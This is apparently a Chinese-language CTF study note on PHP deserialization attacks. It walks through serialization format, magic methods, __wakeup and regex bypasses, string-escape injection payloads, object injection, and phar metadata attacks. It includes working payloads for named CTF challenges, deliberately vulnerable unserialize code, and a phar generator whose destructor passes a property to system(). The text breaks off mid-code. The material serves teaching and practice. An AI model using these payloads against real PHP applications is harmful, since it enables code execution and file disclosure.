序列化#

概述#

序列化（Serialization），简单来说，就是把内存中的对象 / 数据结构（比如 Python 里的字典、Java 里的类实例）转换成字节流、JSON 字符串、XML 等可存储或可传输格式的过程

序列化值#

1
空字符
2
null -> N;
3

4
整型Integer
5
123 ->i:123;
6

7
浮点型double
8
1.5 -> d:1.5;
9

10
boolean型
11
true -> b:1;
12
false -> b:0;
13

14
字符串String
15
"hello" -> s:5:"hello";
16

17
数组Array - 分配数字键
18
array("b") -> a:1:{i:0;s:1:"b"};
19

20
对象Object - 不分配数字键
21
class User{public $n="x"} -> O:4:"User":1:{s:1:"n";s:1:"x"}; //O必须大写

数组讲解

1
例子一
2
//(a:1)一个数组array，包含一个元素；
3
//({...})包裹数组的键值对
4
//(i:0;)键是整数类型，值为零。当创建数组时没有显式指定键名(abc是指定键)，PHP会自动生成数字索引，并且从0开始依次递增，就是分配数字键
5
//(s:1:"b")值的介绍
6

7
array("apple", "banana", "cherry") ->
8
a:3:{i:0;s:5:"apple";i:1;s:6:"banana";i:2;s:6:"cherry";}

类的访问权限修饰符#

public 公共的，在类的内部、子类和类的外部中都可以被调用； // 被序列化时属性值：属性名
protected 受保护的，在类的内部和子类可以被调用，在类的外部不可调用； // 被序列化时属性值: \x00*\x00 属性名
private 私有的，只能在类的内部调用，在子类和类的外部不可调用； // 被序列化时属性值: \x00 类名 \x00 属性名

pop链序列化#

1
<?php
2
class test1
3
{
4
    public $a = "hello";
5
    public $b = true;
6
    public $c = 123;
7
}
8

9
$obj = new test1();
10
echo serialize($obj);

序列化结果

1
O:5:"test1":3:{s:1:"a";s:5:"hello";s:1:"b";b:1;s:1:"c";i:123;}

数组序列化#

1
<?php
2
//PHP自带基础数据类型，不用class
3
$arr = [
4
    "a" => "hello",
5
    "b" => true,
6
    "c" => 123
7
];
8
echo serialize($arr);

序列化结果

1
a:3:{s:1:"a";s:5:"hello";s:1:"b";b:1;s:1:"c";i:123;}
2
//这个不用i:0 1 2是因为序列化时指定了键，abc,时字符串类型的键，所以不用数字的再次指定

protected#

如果变量前是protected，则会在变量名前加上\x00*\x00,private则会在变量名前加上\x00类名\x00,输出时一般需要url编码，若在本地存储更推荐采用base64编码的形式

1
<?php
2
class test{
3
protected $a;
4
private $b;
5
function __construct(){$this->a = "xiaoshizi";$this->b="laoshizi";}
6
function happy(){return $this->a;}
7
}
8
$a = new test();
9
echo serialize($a);
10
echo urlencode(serialize($a));
11
?>
12

13
/*
14
输出：
15
O:4:"test":2:{s:4:" * a";s:9:"xiaoshizi";s:7:" test b";s:8:"laoshizi";}
16
O%3A4%3A%22test%22%3A2%3A%7Bs%3A4%3A%22%00%2A%00a%22%3Bs%3A9%3A%22xiaoshizi%22%3Bs%3A7%3A%22%00test%00b%22%3Bs%3A8%3A%22laoshizi%22%3B%7D
17
*/

反序列化#

概述#

反序列化，简单来说，就是把序列化过程生成的字节流、JSON 字符串、XML 等可存储 / 可传输格式的数据，还原为程序内存中可直接操作的对象 / 数据结构（比如 Python 里的字典、Java 里的类实例、PHP 里的数组 / 对象）的过程

魔术方法#

1
__construct()  //对象被实例化时触发
2

3
__wakeup()  //执行unserialize()时，先会调用这个函数
4

5
__sleep()  //执行serialize()时，先会调用这个函数
6

7
__destruct()  //对象被销毁时触发
8

9
__call()  //在对象上下文中调用不可访问的方法时触发
10

11
__callStatic()  //在静态上下文中调用不可访问的方法时触发
12

13
__get()  //用于从不可访问的属性读取数据或者不存在这个键都会调用此方法
14

15
__set()  //用于将数据写入不可访问的属性
16

17
__isset()  //在不可访问的属性上调用isset()或empty()触发
18

19
__unset()  //在不可访问的属性上使用unset()时触发
20

21
__toString()  //把类当作字符串使用时触发
22

23
__invoke()  //当尝试将对象调用为函数时触发

绕过方法#

1. php7.1+反序列化对类属性不敏感#

序列化中最后一部分说了如果变量前是protected，序列化结果会在变量名前加上\x00*\x00，但在特定版本7.1以上则对于类属性不敏感，比如下面的例子即使没有\x00*\x00也依然会输出abc

1
<?php
2
class test{
3
protected $a;
4
public function __construct(){
5
$this->a = 'abc';
6
}
7
public function __destruct(){
8
echo $this->a;
9
}
10
}
11
unserialize('O:4:"test":1:{s:1:"a";s:3:"abc";}');
12

13
#输出：abc

例题[网鼎杯 2020 青龙组]AreUSerialz

1
<?php
2

3
include("flag.php");
4

5
highlight_file(__FILE__);
6

7
class FileHandler {
8

9
    protected $op;
10
    protected $filename;
11
    protected $content;
12

13
    function __construct() {
14
        $op = "1";
15
        $filename = "/tmp/tmpfile";
16
        $content = "Hello World!";
17
        $this->process();
18
    }
19

20
    public function process() {
21
        if($this->op == "1") {
22
            $this->write();
23
        } else if($this->op == "2") {
24
            $res = $this->read();
25
            $this->output($res);
26
        } else {
27
            $this->output("Bad Hacker!");
28
        }
29
    }
30

31
    private function write() {
32
        if(isset($this->filename) && isset($this->content)) {
33
            if(strlen((string)$this->content) > 100) {
34
                $this->output("Too long!");
35
                die();
36
            }
37
            $res = file_put_contents($this->filename, $this->content);
38
            if($res) $this->output("Successful!");
39
            else $this->output("Failed!");
40
        } else {
41
            $this->output("Failed!");
42
        }
43
    }
44
//process() 中op=1时触发的写文件方法，但是我们让op=2，不走这个分支，也就不会触发
45

46
    private function read() {
47
        $res = "";
48
        if(isset($this->filename)) {
49
            $res = file_get_contents($this->filename);
50
        }
51
        return $res;
52
    }
53

54
    private function output($s) {
55
        echo "[Result]: <br>";
56
        echo $s;
57
    }
58
//辅助输出
59

60
    function __destruct() {
61
        if($this->op === "2")
62
            $this->op = "1";
63
        $this->content = "";
64
        $this->process();
65
    }
66

67
}
68

69
function is_valid($s) {
70
    for($i = 0; $i < strlen($s); $i++)
71
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
72
            return false;
73
    return true;
74
}
75

76
if(isset($_GET{'str'})) {
77

78
    $str = (string)$_GET['str'];
79
    if(is_valid($str)) {
80
        $obj = unserialize($str);
81
    }
82

83
}

乍一看很多，仔细分析：找到危险函数 file_get_contents，接着回溯找调用逻辑链。 file_get_contents所在是read()，read()在process()中被调用，process()在__destruct()中被调用。所以调用过程：__destruct()--> process()-->read()

1
    function __destruct() {
2
        if($this->op === "2")
3
            $this->op = "1";
4
        $this->content = "";
5
        $this->process();
6
    }
7

8
}
9

10
    public function process() {
11
        if($this->op == "1") {
12
            $this->write();
13
        } else if($this->op == "2") {
14
            $res = $this->read();
15
            $this->output($res);
16
        } else {
17
            $this->output("Bad Hacker!");
18
        }
19
    }
20

21
    private function read() {
22
        $res = "";
23
        if(isset($this->filename)) {
24
            $res = file_get_contents($this->filename);
25
        }
26
        return $res;
27
    }

接下来分析这个调用过程，有两个绕过

__destruct()中要求op！===2且process()中要求op==2
绕过is_valid() 函数
绕过一 既要op！===2，又要op==2，那么就用$op=2绕过，类型整数不等于字符串但数值相等
绕过二 涉及到除__destruct()、process()、read()之外的其它方法，不参与逻辑推理，但是会对整个过程起到限制、校验的作用

1
function is_valid($s) {
2
    for($i = 0; $i < strlen($s); $i++)
3
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
4
            return false;
5
    return true;
6
}
7

8
if(isset($_GET{'str'})) {
9

10
    $str = (string)$_GET['str'];
11
    if(is_valid($str)) {
12
        $obj = unserialize($str);
13
    }
14
//限制GET传参，且传入的字符串需经过 is_valid 校验

private和protected属性经过序列化都存在不可打印字符在32-125之外，但是对于PHP版本7.1+，对属性的类型不敏感，我们可以将protected类型改为public，以消除不可打印字符。

所以最终的payload就构造完了

1
<?php
2
class FileHandler {
3
  public $op = 2;
4
  public $filename = "/var/www/html/flag.php";
5
  public $content;
6
}
7
$obj = new FileHandler();// 新建对象
8
echo serialize($obj);// 序列化这个对象，输出字符串
9
?>
10
/*输出：
11
O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:22:"/var/www/html/flag.php";s:7:"content";N;}
12
*/

2. `__wakeup`绕过#

1
版本：
2
PHP5 < 5.6.25
3
PHP7 < 7.0.10

利用方式：序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeup的执行。

1
<?php
2
class test{
3
public $a;
4
public function __construct(){
5
$this->a = 'abc';
6
}
7
public function __wakeup(){
8
$this->a='666';
9
}
10
public function __destruct(){
11
echo $this->a;
12
}
13
}
14
$t='O:4:"test":1:{s:1:"a";s:4:"yyds";}';
15
unserialize($t);

如果执行unserialize(‘O:4:“test”:1:{s:1:“a”;s:4:“yyds”;}’);输出结果为666；而把对象属性个数的值增大执行unserialize(‘O:4:“test”:2:{s:1:“a”;s:4:“yyds”;}’);输出结果为yyds

例题[极客大挑战 2019]PHP

1
//重点看class.php
2
<?php
3
include 'flag.php';
4

5
error_reporting(0);
6

7
class Name{
8
    private $username = 'nonono';
9
    private $password = 'yesyes';
10

11
    public function __construct($username,$password){
12
        $this->username = $username;
13
        $this->password = $password;
14
    }
15

16
    function __wakeup(){
17
        $this->username = 'guest';
18
    }
19

20
    function __destruct(){
21
        if ($this->password != 100) {
22
            echo "</br>NO!!!hacker!!!</br>";
23
            echo "You name is: ";
24
            echo $this->username;echo "</br>";
25
            echo "You password is: ";
26
            echo $this->password;echo "</br>";
27
            die();
28
        }
29
        if ($this->username === 'admin') {
30
            global $flag;
31
            echo $flag;
32
        }else{
33
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
34
            die();
35

36
        }
37
    }
38
}
39
?>
40

41
<?php
42
    include 'class.php';
43
    $select = $_GET['select'];
44
    $res=unserialize(@$select);
45
    ?>

要想echo flag，需要让username强=admin，并且password=100，但是__weakup()魔术方法会把username重置为guest,因此我们需要绕过weakup()

1
<?php
2
class Name {
3

4
private $username='admin';
5
private $password=100;
6

7
}
8
$a=new Name;
9
echo serialize($a);
10

11
?>
12

13
/*输出：
14
O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}
15
*/

这样的话，表示对象属性个数的值等于真实的属性个数(两个，username和password)，所以我们需要修改输出的序列化字符串的表示对象属性个数的值：2改3

1
O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

3. 绕过正则匹配序列化标签#

3.1 加号绕过#

注意在url里传参时 + 要编码为 %2B

1
$a = 'O:4:"test":1:{s:1:"a";s:3:"abc";}'; //+号绕过
2
$b = str_replace('O:4','O:+4', $a);
3
unserialize(match($b));

3.2 serialize( array( a) );#

a为要反序列化的对象（序列化结果开头是a，不影响作为数组元素的$a的析构）

1
serialize(array($a));
2
unserialize('a:1:{i:0;O:4:"test":1:{s:1:"a";s:3:"abc";}}');

3.3 利用引用使两值恒等#

1
<?php
2
class test{
3
    public $a;
4
    public $b;
5
    public function __construct(){
6
        $this->a = 'abc';
7
        $this->b= &$this->a; //关键一行
8
    }
9
    public function  __destruct(){
10

11
    if($this->a===$this->b){
12
        echo 666;
13
   }
14
}
15
}
16
$a = serialize(new test());

上面这个例子将$b设置为$a的引用，可以使$a永远与$b相等

3.4 16进制绕过字符过滤#

1
O:4:"test":2:{s:4:"%00*%00a";s:3:"abc";s:7:"%00test%00b";s:3:"def";}
2
可以写成
3
O:4:"test":2:{S:4:"\00*\00\61";s:3:"abc";s:7:"%00test%00b";s:3:"def";}
4
表示字符类型的s大写时，会被当成16进制解析。

4 字符串逃逸#

4.1 原因/理#

当开发者使用先将对象序列化，再将对象进行过滤，最后反序列化的思路进行时，就容易产生字符串逃逸漏洞

根本原因： 在对象被序列化之后、反序列化之前，程序对这段序列化字符串进行了“修改”（通常是字符串替换）
原理： 利用 PHP 严格按照声明长度读取字符串的特性，通过长度差，让 PHP 把我们注入的恶意字符串当作正常的序列化结构（如属性、对象）来解析

4.2 案例#

这里直接copy一下，假设我们先定义一个user类，然后里面一共有3个成员变量：username、password、isVIP。

1
class user{
2
    public $username;
3
    public $password;
4
    public $isVIP;
5

6
    public function __construct($u,$p){
7
        $this->username = $u;
8
        $this->password = $p;
9
        $this->isVIP = 0;
10
    }
11
}

可以看到当这个类被初始化的时候，isVIP变量默认是0，并且不受初始化传入的参数影响。

1
<?php
2
class user{
3
    public $username;
4
    public $password;
5
    public $isVIP;
6

7
    public function __construct($u,$p){
8
        $this->username = $u;
9
        $this->password = $p;
10
        $this->isVIP = 0;
11
    }
12
}
13

14
$a = new user("admin","123456");
15
$a_seri = serialize($a);
16

17
echo $a_seri;
18
?>

这一段程序的输出结果如下：

1
O:4:"user":3:{s:8:"username";s:5:"admin";s:8:"password";s:6:"123456";s:5:"isVIP";i:0;}

可以看到，对象序列化之后的isVIP变量是0。

这个时候我们增加一个函数，用于对admin字符进行替换，将admin替换为hacker，替换函数如下：

1
<?php
2
class user{
3
    public $username;
4
    public $password;
5
    public $isVIP;
6

7
    public function __construct($u,$p){
8
        $this->username = $u;
9
        $this->password = $p;
10
        $this->isVIP = 0;
11
    }
12
}
13

14
function filter($s){
15
    return str_replace("admin","hacker",$s);
16
}
17

18
$a = new user("admin","123456");
19
$a_seri = serialize($a);
20
$a_seri_filter = filter($a_seri);
21

22
echo $a_seri_filter;
23
?>

这一段程序的输出为：

1
O:4:"user":3:{s:8:"username";s:5:"hacker";s:8:"password";s:6:"123456";s:5:"isVIP";i:0;}

这个时候我们把这两个程序的输出拿出来对比一下：

1
O:4:"user":3:{s:8:"username";s:5:"admin";s:8:"password";s:6:"123456";s:5:"isVIP";i:0;}  //未过滤
2
O:4:"user":3:{s:8:"username";s:5:"hacker";s:8:"password";s:6:"123456";s:5:"isVIP";i:0;} //已过滤

可以看到已过滤字符串中的hacker与前面的字符长度不对应了

1
s:5:"admin";
2
s:5:"hacker";

在这个时候，对于我们，在新建对象的时候，传入的admin就是我们的可控变量

接下来明确我们的目标：将isVIP变量的值修改为1

首先我们将我们的现有子串和目标子串进行对比：

1
";s:8:"password";s:6:"123456";s:5:"isVIP";i:0;} //现有子串
2
";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;} //目标子串

也就是说，我们要在admin这个可控变量的位置，注入我们的目标子串。

首先计算我们需要注入的目标子串的长度：

1
";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}
2
//以上字符串的长度为47

因为我们需要逃逸的字符串长度为47，并且admin每次过滤之后都会变成hacker，也就是说每出现一次admin，就会多1个字符。

因此我们在可控变量处，重复47遍admin，然后加上我们逃逸后的目标子串，可控变量修改如下：

1
adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}

完整代码如下：

1
<?php
2
class user{
3
    public $username;
4
    public $password;
5
    public $isVIP;
6

7
    public function __construct($u,$p){
8
        $this->username = $u;
9
        $this->password = $p;
10
        $this->isVIP = 0;
11
    }
12
}
13

14
function filter($s){
15
    return str_replace("admin","hacker",$s);
16
}
17

18
$a = new user('adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}','123456');
19
$a_seri = serialize($a);
20
$a_seri_filter = filter($a_seri);
21
echo $a_seri;
22
echo '------------------------------------------------------------';
23
echo $a_seri_filter;
24
?>

输出结果为

1
O:4:"user":3:{s:8:"username";s:282:"adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}";s:8:"password";s:6:"123456";s:5:"isVIP";i:0;}
2

3
O:4:"user":3:{s:8:"username";s:282:"hackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhacker";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}";s:8:"password";s:6:"123456";s:5:"isVIP";i:0;}

我们可以数一下hacker的数量，一共是47个hacker，共282个字符，正好与前面282相对应。

后面的注入子串也正好完成了逃逸。

反序列化后，多余的子串会被抛弃

我们接着将这个序列化结果反序列化，然后将其输出，完整代码如下：

1
<?php
2
class user{
3
    public $username;
4
    public $password;
5
    public $isVIP;
6

7
    public function __construct($u,$p){
8
        $this->username = $u;
9
        $this->password = $p;
10
        $this->isVIP = 0;
11
    }
12
}
13

14
function filter($s){
15
    return str_replace("admin","hacker",$s);
16
}
17

18
$a = new user('adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}','123456');
19
$a_seri = serialize($a);
20
$a_seri_filter = filter($a_seri);
21
$a_seri_filter_unseri = unserialize($a_seri_filter);
22

23
var_dump($a_seri_filter_unseri);
24
?>

程序输出如下：

1
object(user)#2 (3) {
2
  ["username"]=>
3
  string(282) "hackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhacker"
4
  ["password"]=>
5
  string(6) "123456"
6
  ["isVIP"]=>
7
  int(1)
8
}

可以看到这个时候，isVIP这个变量就变成了1，反序列化字符逃逸的目的也就达到了。

4.3 例题#

1
<?php
2
highlight_file(__FILE__);
3
error_reporting(0);
4
class a
5
{
6
    public $uname;
7
    public $password;
8
    public function __construct($uname,$password)
9
    {
10
        $this->uname=$uname;
11
        $this->password=$password;
12
    }
13
    public function __wakeup()
14
    {
15
            if($this->password==='yu22x')
16
            {
17
                include('flag.php');
18
                echo $flag;
19
            }
20
            else
21
            {
22
                echo 'wrong password';
23
            }
24
        }
25
    }
26
function filter($string){
27
    return str_replace('Firebasky','Firebaskyup',$string);
28
}
29
$uname=$_GET[1];
30
$password=1;
31
unserialize(filter(serialize(new a($uname,$password))));
32
?> wrong password

想办法把password=‘yu22x’传进去，payload为：

1
FirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebasky";s:8:"password";s:5:"yu22x";}

4.4 过滤后字符变少#

也是copy，首先，和上面的主体代码还是一样，还是同一个class，与之有区别的是过滤函数中，我们将hacker修改为hack。

1
<?php
2
class user{
3
    public $username;
4
    public $password;
5
    public $isVIP;
6

7
    public function __construct($u,$p){
8
        $this->username = $u;
9
        $this->password = $p;
10
        $this->isVIP = 0;
11
    }
12
}
13

14
function filter($s){
15
    return str_replace("admin","hack",$s);
16
}
17

18
$a = new user('admin','123456');
19
$a_seri = serialize($a);
20
$a_seri_filter = filter($a_seri);
21

22
echo $a_seri_filter;
23
?>

输出结果：

1
O:4:"user":3:{s:8:"username";s:5:"hack";s:8:"password";s:6:"123456";s:5:"isVIP";i:0;}

同样比较一下现有子串和目标子串：

1
";s:8:"password";s:6:"123456";s:5:"isVIP";i:0;} //现有子串
2
";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;} //目标子串

因为过滤的时候，将5个字符删减为了4个，所以和上面字符变多的情况相反，随着加入的admin的数量增多，现有子串后面会缩进来。

计算一下目标子串的长度：

1
";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;} //目标子串
2
//长度为47

再计算一下到下一个可控变量的字符串长度：

1
";s:8:"password";s:6:"
2
//长度为22

因为每次过滤的时候都会少1个字符，因此我们先将admin字符重复22遍（这里的22遍不像字符变多的逃逸情况精确，后面可能会需要做调整）

完整代码如下：（这里的变量里一共有22个admin）

1
<?php
2
class user{
3
    public $username;
4
    public $password;
5
    public $isVIP;
6

7
    public function __construct($u,$p){
8
        $this->username = $u;
9
        $this->password = $p;
10
        $this->isVIP = 0;
11
    }
12
}
13

14
function filter($s){
15
    return str_replace("admin","hack",$s);
16
}
17

18
$a = new user('adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin','123456');
19
$a_seri = serialize($a);
20
$a_seri_filter = filter($a_seri);
21

22
echo $a_seri_filter;
23
?>

输出结果：

1
O:4:"user":3:{s:8:"username";s:110:"hackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhack";s:8:"password";s:6:"123456";s:5:"isVIP";i:0;}

注意：PHP反序列化的机制是，比如如果前面是规定了有10个字符，但是只读到了9个就到了双引号，这个时候PHP会把双引号当做第10个字符，也就是说不根据双引号判断一个字符串是否已经结束，而是根据前面规定的数量来读取字符串。

这里我们需要仔细看一下s后面是110，也就是说我们需要读取到110个字符。从第一个引号开始，110个字符如下：

1
hackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhack";s:8:"password";s:6:"

也就是说123456这个地方成为了我们的可控变量，在123456可控变量的位置中添加我们的目标子串

1
";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;} //目标子串

完整代码为：

1
<?php
2
class user{
3
    public $username;
4
    public $password;
5
    public $isVIP;
6

7
    public function __construct($u,$p){
8
        $this->username = $u;
9
        $this->password = $p;
10
        $this->isVIP = 0;
11
    }
12
}
13

14
function filter($s){
15
    return str_replace("admin","hack",$s);
16
}
17

18
$a = new user('adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin','";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}');
19
$a_seri = serialize($a);
20
$a_seri_filter = filter($a_seri);
21

22
echo $a_seri_filter;
23
?>

输出：

1
O:4:"user":3:{s:8:"username";s:110:"hackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhack";s:8:"password";s:47:"";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}";s:5:"isVIP";i:0;}

1
//选中部分
2
hackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhack";s:8:"password";s:47:"

选中部分一共有111个字符，

造成这种现象的原因是：替换之前我们目标子串的位置是123456，一共6个字符，替换之后我们的目标子串显然超过10个字符，所以会造成计算得到的payload不准确

解决办法是：多添加1个admin，这样就可以补上缺少的字符。

修改后代码如下：

1
<?php
2
class user{
3
    public $username;
4
    public $password;
5
    public $isVIP;
6

7
    public function __construct($u,$p){
8
        $this->username = $u;
9
        $this->password = $p;
10
        $this->isVIP = 0;
11
    }
12
}
13

14
function filter($s){
15
    return str_replace("admin","hack",$s);
16
}
17

18
$a = new user('adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin','";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}');
19
$a_seri = serialize($a);
20
$a_seri_filter = filter($a_seri);
21

22
echo $a_seri_filter;
23
?>

分析一下输出结果：

1
O:4:"user":3:{s:8:"username";s:115:"hackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhack";s:8:"password";s:47:"";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}";s:5:"isVIP";i:0;}

可以看到，这样就对了。

我们将对象反序列化然后输出，代码如下：

1
<?php
2
class user{
3
    public $username;
4
    public $password;
5
    public $isVIP;
6

7
    public function __construct($u,$p){
8
        $this->username = $u;
9
        $this->password = $p;
10
        $this->isVIP = 0;
11
    }
12
}
13

14
function filter($s){
15
    return str_replace("admin","hack",$s);
16
}
17

18
$a = new user('adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin','";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}');
19
$a_seri = serialize($a);
20
$a_seri_filter = filter($a_seri);
21
$a_seri_filter_unseri = unserialize($a_seri_filter);
22

23
var_dump($a_seri_filter_unseri);
24
?>

得到结果：

1
object(user)#2 (3) {
2
  ["username"]=>
3
  string(115) "hackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhack";s:8:"password";s:47:""
4
  ["password"]=>
5
  string(6) "123456"
6
  ["isVIP"]=>
7
  int(1)
8
}

可以看到，这个时候isVIP的值也为1，也就达到了我们反序列化字符逃逸的目的了

tips：数组逃逸闭合要加一个}，即用”;}闭合

对象注入#

当用户的请求在传给反序列化函数unserialize()之前没有被正确的过滤时就会产生漏洞。因为PHP允许对象序列化，攻击者就可以提交特定的序列化的字符串给一个具有该漏洞的unserialize函数，最终导致一个在该应用范围内的任意PHP对象注入。对象注入类似于一个利用反序列化魔术方法进行变量覆盖的过程。

对象漏洞出现得满足两个前提

unserialize的参数可控。
代码里有定义一个含有魔术方法的类，并且该方法里出现一些使用类成员变量作为参数的存在安全问题的函数。

给出一个案例帮助理解

1
<?php
2
class A{
3
    var $test = "y4mao";
4
    function __destruct(){
5
        echo $this->test;
6
    }
7
}
8
$a = 'O:1:"A":1:{s:4:"test";s:5:"maomi";}';
9
unserialize($a);

在脚本运行结束后便会调用_destruct函数，同时会覆盖test变量输出maomi

phar反序列化#

phar，全称为PHP Archive，phar扩展提供了一种将整个PHP应用程序放入.phar文件中的方法，以方便移动、安装。 .phar文件的最大特点是将几个文件组合成一个文件的便捷方式。 .phar文件提供了一种将完整的PHP程序分布在一个文件中并从该文件中运行的方法。

1. phar文件结构#

stub 一个供phar扩展用于识别的标志，格式为xxx<?php xxx; __HALT_COMPILER();?>，前面内容不限，但必须以__HALT_COMPILER();?>来结尾，否则phar扩展将无法识别这个文件为phar文件。
manifest phar文件本质上是一种压缩文件，其中每个被压缩文件的权限、属性等信息都放在这部分。这部分还会以序列化的形式存储用户自定义的meta-data，这里即为反序列化漏洞点。
contents 被压缩文件的内容。
signature 签名，放在文件末尾

2. 利用方法#

可利用原因 使用phar://伪协议解析phar文件时对meta-data进行反序列化操作
利用方法 将要序列化的内容写入meta-data中，再使用phar伪协议进行反序列化。首先需要生成phar文件，在php的配置文件中需要设置phar.readonly= Off

1
<?php
2
class A {
3
    public $a;
4

5
    public function __destruct()
6
    {
7
        system($this->a);
8
    }
9
}
10
$a = new A();
11
$a->a='ls';
12
$phar = new Phar("test.phar");//后缀名必须为phar
13
$phar->startBuffering();
14
$phar->setStub("<?php __HALT_COMPILER();?>");//设置stub
15
$phar->setMetadata($a);//将自定义的meta-data存入manifest
16
$phar->addFromString("test.txt", "test");//添加要压缩的文件
17
//签名自动计算
18
$phar->stopBuffering();
19
?>

可以触发phar伪协议的函数

受影响函数列表
`fileatime`	`filectime`	`file_exists`	`file_get_contents`
`file_put_contents`	`file`	`filegroup`	`fopen`
`fileinode`	`filemtime`	`fileowner`	`fileperms`
`is_dir`	`is_executable`	`is_file`	`is_link`
is_readable	`is_writable`	`is_writeable`	`parse_ini_file`
`copy`	`unlink`	`stat`	`readfile`
但实际上只要调用了php_stream_open_wrapper的函数，都存在这样的问题。因此还有以下函数：

1
exif
2
exif_thumbnail
3
exif_imagetype
4

5
gd
6
imageloadfont
7
imagecreatefrom
8

9
hash
10
hash_hmac_file
11
hash_file
12
hash_update_file
13
md5_file
14
sha1_file
15

16
file / url
17
get_meta_tags
18
get_headers
19
mime_content_type
20

21
standard
22
getimagesize
23
getimagesizefromstring
24

25
finfo
26
finfo_file
27
finfo_buffer
28

29
zip
30
$zip = new ZipArchive();
31
$res = $zip->open('c.zip');
32
$zip->extractTo('phar://test.phar/test');
33

34
Postgres
35
<?php
36
$pdo = new PDO(sprintf("pgsql:host=%s;dbname=%s;user=%s;password=%s", "127.0.0.1", "postgres", "sx", "123456"));
37
@$pdo->pgsqlCopyFromFile('aa', 'phar://test.phar/aa');
38

39
MySQL
40
LOAD DATA LOCAL INFILE也会触发这个php_stream_open_wrapper
41
<?php
42
class A {
43
    public $s = '';
44
    public function __wakeup () {
45
        system($this->s);
46
    }
47
}
48
$m = mysqli_init();
49
mysqli_options($m, MYSQLI_OPT_LOCAL_INFILE, true);
50
$s = mysqli_real_connect($m, 'localhost', 'root', '123456', 'easyweb', 3306);
51
$p = mysqli_query($m, 'LOAD DATA LOCAL INFILE \'phar://test.phar/test\' INTO TABLE a  LINES TERMINATED BY \'\r\n\'  IGNORE 1 LINES;');
52
再配置一下mysqld。（非默认配置）
53
[mysqld]
54
local-infile=1
55
secure_file_priv=""

例题

1
<?php
2
//flag in flag.php
3
error_reporting(0);
4
highlight_file(__FILE__);
5
class A {
6
    public $a;
7

8
    public function __destruct()
9
    {
10
        system($this->a);
11
    }
12
}
13
if(isset($_GET['file'])) {
14
    if(strstr($_GET['file'], "flag")) {
15
        die("Get out!");
16
    }
17
    echo file_get_contents($_GET['file']);
18
}
19

20
if(isset($_FILES['file'])) {
21
    mkdir("upload");
22
    $uuid = uniqid();
23
    $ext = explode(".", $_FILES["file"]["name"]);
24
    $ext = end($ext);
25
    move_uploaded_file($_FILES['file']['tmp_name'], "upload/".$uuid.".".$ext);
26
    echo "Upload Success! FilePath: upload/".$uuid.".".$ext;
27
}
28
?>
29
<html>
30
<head>
31
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
32
</head>
33
<body>
34
<form action="" method="post" enctype="multipart/form-data">
35
    <input type="file" name="file" />
36
    <input type="submit" value="load" />
37
</form>
38
</body>
39

40
</html>

生成phar文件的代码：

1
<?php
2
class A {
3
    public $a;
4

5
    public function __destruct()
6
    {
7
        system($this->a);
8
    }
9
}
10
$a = new A();
11
$a->a='ls';
12
$phar = new Phar("test.phar");//后缀名必须为phar
13
$phar->startBuffering();
14
$phar->setStub("<?php __HALT_COMPILER();?>");//设置stub
15
$phar->setMetadata($a);//将自定义的meta-data存入manifest
16
